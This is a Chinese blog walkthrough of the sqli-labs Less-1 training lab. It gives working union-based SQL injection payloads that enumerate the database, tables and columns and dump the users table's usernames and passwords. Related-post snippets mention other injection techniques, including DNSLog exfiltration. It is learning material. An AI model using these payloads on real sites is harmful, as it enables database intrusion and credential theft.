sqli-less-1

已于 2024-11-15 21:20:53 修改
阅读量523 收藏 5
点赞数 7
分类专栏: sqli 文章标签: 数据库 sql
于 2024-11-15 19:42:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74138139/article/details/143805171
版权


1.寻找注入点(和数据库有交互  ?aa=bbb )

?id=1

2.判断闭合方式


        先判断数字型、字符型
                在后面输入  ?id=1asdf  (报错数字型,不报错字符型)
        在判断闭合方式
                看输入内容后面符号('单引号闭合)

                  

3.判断列数 

?id=1' order by 3 --+

看是否报错3代表3列,如果变成4则会报错

4.查看

?id=-1' union select 1,2,3 --+

(把1改成-1是为了让页面显示出select1,2,3那么前面就不能查询到内容)

5.获取数据库名(security

?id=-1' union select 1,database(),3 --+

6.获取表名(emails,referers,uagents,users

?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 --+

group_concat将所有数据聚合在一行进行显示

table_name 表名

information_schema.tables 去下面的这个表(mysql5.0版本以上自带的)

table_schema(数据库名字)

(查到表名后,猜一下我们需要的东西在那个表里,直接查看哪个表)

7.获取列名(id,username,password

?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 --+

8.获取具体数据

获取username(Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

?id=-1' union select 1,(select group_concat(username)from users),3 --+

获取password(Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

?id=-1' union select 1,(select group_concat(password)from users),3 --+

sqli less1
klxxxxxx的博客
10-23 2713
sqli-labs less-1 前言 鄙人不才,只是把平时学习的笔记整理下来,仅供参考,望大家指点。 首先我们需要了解,什么是sql注入? SQL注入是比较常见的网络攻击方式,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写代码时的疏忽,导致他人可以通过操作输入来修改后台SQL语句达到代码执行,进行攻击的后果 注入手法的分类 注入手法可以分为: 联合查询注入、报错型注入、布尔型注入、延时注入、堆叠注入 从数据类型可以分为: 字符型、数值型 从注入位置可以分类为: GET数据(提交数据的方式为G
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1823
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-Less1
qq_44060093的博客
04-19 563
最近准备拾起sql注入,sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
SQLi-less-1
morningstar929的博客
09-07 211
1.判断字符型还是整型注入 http://127.0.0.1/sqli/Less-1/?id=1 正常 http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 与上述一样 http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 与上述一样 由此可以判断不是整型注入 http://127.0.0.1/sqli/Less-1/?id=1%27%20and%201=1%20–+ 与上述一样 http://127.0.0.1/sqli/Less-1/?id
sqli less-01
ANYOUZHEN的博客
04-29 1364
我们试着输入id=1,查看是否有回显 接着输入id=1',发现出现报错 构造payload查询列表,?id=1' order by 3--+ 当我们输入?id=1' order by 4--+时出现了unknown,说明列表为3 接下来我们使用联合查询,?id=-1' union select 1,2,3--+; 然后发现2,3列有回应,说明可以爆破出数据库,列,用户和密码 接下来我们查询数据库,http://127.0.0.1/sqli/Less-1/?id=-1' union
SQLI-Lab】-Less1
xinyue9966的博客
01-20 267
SQLI-Less1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)前言一、GET单引号字符型注入二、步骤总结 前言 一、GET单引号字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 http://192.168.135.149/sqli/Less-1/?id=1' and 1=1 -
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2282
利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 794
一丢丢Sqli-labs小练习
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 853
一丢丢Sqli-labs小练习
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1030
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1364
这也是我刚开始学手工注入,笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 2065
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 3595
sqli-labs靶场之前建议补一下基础。
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 716
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
sqli-lab Less1-10通关(手把手跟着做就行)
weixin_65725423的博客
09-23 1246
页面中“Please input the ID as parameter with numeric value”意思是请以数字值作为参数输入用户标示符。首先判断这是数字注入还是字符注入。经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询。然后在id后面加个',就会报错,可能是字符型注入输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入然后用order by 来判断有多少列数据,order by 3,发现是页面正常。
SQL注入之sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 6825
SQL注入之sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
sqli-labs (less1-less4)
Xi4or0uji
07-24 1802
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
阿里云ecs 8核 16G 内存 装有redis6 分配了3G内存,和2个tomcat 每个tomcat 4G 服务器反应迟钝,如何确认不是redis的问题
最新发布
zqy216_2008的博客
05-21 878
我们经常用redis 但遇到tomcat timeout的时候,如何确认不是redis的问题。 不能因为这个再去搞个redis 压力测试。有没有更省劲的方法来确认不是redis的问题
SQL注入—详解(4)【DNSLog注入】
2402_84408069的博客
05-19 967
DNSLog注入是一种利用DNS协议进行信息外泄的攻击技术,通过构造特殊的DNS查询请求,将敏感数据嵌入到域名查询中,使攻击者能够通过监控DNS日志来获取这些数据。其工作原理是利用数据库的load_file()函数读取远程文件,并通过DNS解析记录获取敏感信息。攻击场景包括显错注入和盲注,前提条件是数据库具有root权限、可读写权限,且目标系统为Windows。防御措施包括输入验证与过滤、网络层防护、系统加固、监控与检测以及安全开发实践。通过实施这些措施,可以有效降低DNSLog注入的风险。
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值